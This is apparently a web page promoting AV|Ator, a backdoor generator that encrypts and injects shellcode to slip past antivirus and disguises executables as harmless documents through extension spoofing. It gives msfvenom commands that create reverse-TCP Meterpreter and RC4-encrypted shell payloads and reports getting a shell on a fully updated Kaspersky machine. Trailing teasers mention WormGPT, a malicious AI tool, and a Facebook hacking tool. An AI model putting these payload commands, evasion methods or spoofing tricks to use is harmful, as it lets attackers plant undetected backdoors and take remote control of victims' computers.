AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:
[https://attack.mitre.org/techniques/T1055/]:
The application has a form which consists of three main inputs (See screenshot bellow):
Important note: The shellcode should be provided as a C# byte array.
The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.
In simple words, spoof an executable file to look like having an “innocent” extention like ‘pdf’, ‘txt’ etc. E.g. the file “testcod.exe” will be interpreted as “tesexe.doc”
Beware of the fact that some AVs alert the spoof by its own as a malware.
I guess you all know what it is 🙂
Getting a shell in a windows 10 machine running fully updated kaspersky AV
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Either compile the project or download the already compiled executable
Linux:
Install Mono according to your linux distribution, download and run the binaries
e.g. in kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
Damon Mohammadbagher for the encryption procedure
Prepare to take your Among Us gaming experience to the next level with the latest…
WormGPT is a malicious AI tool promoted on the dark web as the adversary of…
Welcome to the world of Facebook_hack, a potent tool designed for educational purposes to showcase…
Step into the realm of ethical hacking with HackerToolkit, your ultimate resource for penetration testing,…
Bienvenidos a este espacio donde compartiré artículos relacionados a la Ciberseguridad y Hacking en general.…
Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…